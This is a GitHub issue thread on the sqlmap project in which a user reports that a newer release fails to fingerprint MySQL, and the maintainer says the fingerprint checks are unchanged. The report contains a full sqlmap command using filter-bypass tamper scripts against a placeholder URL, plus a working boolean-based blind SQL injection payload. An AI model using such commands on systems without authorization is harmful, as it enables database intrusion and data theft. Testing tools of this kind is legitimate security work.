### ISSUE TITLE
1.4.2.13#dev vs. 1.2.10 

### ISSUE THREAD

**Issue by madaxcrr** [sqlmapproject/sqlmap#4106]
Issue comes when bypassing a simple filter with  --tamper=between,versionedkeywords
Not using tamper both versions failed.

./sqlmap.py -u "https://example/rech/?meve=5&familial=3"  --random-agent --level=5 --risk=3 --timeout=90000  -v 3   -p meve   --tamper=between,versionedkeywords  --dbs
---
Parameter: meve (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: meve=5) AND 9354=9354-- HGbr&familial=3
    Vector: AND [INFERENCE]
---

1.4.2.13#dev fails to recognize Mysql
[WARNING] the back-end DBMS is not MySQL

1.2.10 is successful in dumping databases and tables

Thanks

**Comment by stamparm** [comment]
A) 1.2.10 MySQL "fingerprinting": https://github.com/sqlmapproject/sqlmap/blob/1.2.10/plugins/dbms/mysql/fingerprint.py#L163-L176

B) 1.4.2.13#dev MySQL "fingeprinting": https://github.com/sqlmapproject/sqlmap/blob/5f39016af722f415be44579a8e231a3aa1cdfb7b/plugins/dbms/mysql/fingerprint.py#L179-L196

-> they are **the same** (notice `QUARTER(NULL) IS NULL` and `SESSION_USER() LIKE USER()`)

---

p.s. you are using `--tamper` and `--timeout`. Please don't raise this kind of issues
